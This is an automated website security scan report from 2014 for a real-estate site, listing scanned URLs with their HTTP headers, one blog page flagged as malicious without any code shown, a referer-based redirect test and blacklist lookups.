Scanned pages/files
Request | Server response | Status |
http://dpsrealestate.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:27 GMT Location: http://www.dpsrealestate.com/ Server: nginx/1.4.7 Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/ | 200 OK Content-Length: 7677 Content-Type: text/html | clean |
http://www.dpsrealestate.com/jscript/copyright.js | 200 OK Content-Length: 652 Content-Type: application/javascript | clean |
http://dpsrealestate.com/jscript/getcontent.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:28 GMT Location: http://www.dpsrealestate.com/jscript/getcontent.js Server: nginx/1.4.7 Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/jscript/getcontent.js | 200 OK Content-Length: 1121 Content-Type: application/javascript | clean |
http://dpsrealestate.com/blog/ | 200 OK Content-Length: 63254 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://dpsrealestate.com/jscript/copyright.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:29 GMT Location: http://www.dpsrealestate.com/jscript/copyright.js Server: nginx/1.4.7 Content-Length: 324 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://www.dpsrealestate.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://dpsrealestate.com/scroller/jquery.easing.1.3.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:32 GMT Location: http://www.dpsrealestate.com/scroller/jquery.easing.1.3.js Server: nginx/1.4.7 Content-Length: 333 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/scroller/jquery.easing.1.3.js | 200 OK Content-Length: 8100 Content-Type: application/javascript | clean |
http://dpsrealestate.com/scroller/jquery.mousewheel.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:33 GMT Location: http://www.dpsrealestate.com/scroller/jquery.mousewheel.min.js Server: nginx/1.4.7 Content-Length: 337 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/scroller/jquery.mousewheel.min.js | 200 OK Content-Length: 1175 Content-Type: application/javascript | clean |
http://dpsrealestate.com/scroller/jquery.mCustomScrollbar.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:33 GMT Location: http://www.dpsrealestate.com/scroller/jquery.mCustomScrollbar.js Server: nginx/1.4.7 Content-Length: 339 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/scroller/jquery.mcustomscrollbar.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://www.dpsrealestate.com/scroller/ | 200 OK Content-Length: 1838 Content-Type: text/html | clean |
http://www.dpsrealestate.com/scroller/_i.php | 200 OK Content-Length: 21 Content-Type: text/html | clean |
http://www.dpsrealestate.com/scroller/dynamic_content.html | 200 OK Content-Length: 1238 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dpsrealestate.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 15 Apr 2014 04:46:27 GMT
Location: http://www.dpsrealestate.com/
Server: nginx/1.4.7
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
...304 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dpsrealestate.com
Referer: http://www.google.com/search?q=dpsrealestate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dpsrealestate.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dpsrealestate.com/
Result: dpsrealestate.com is not infected or malware details are not published yet.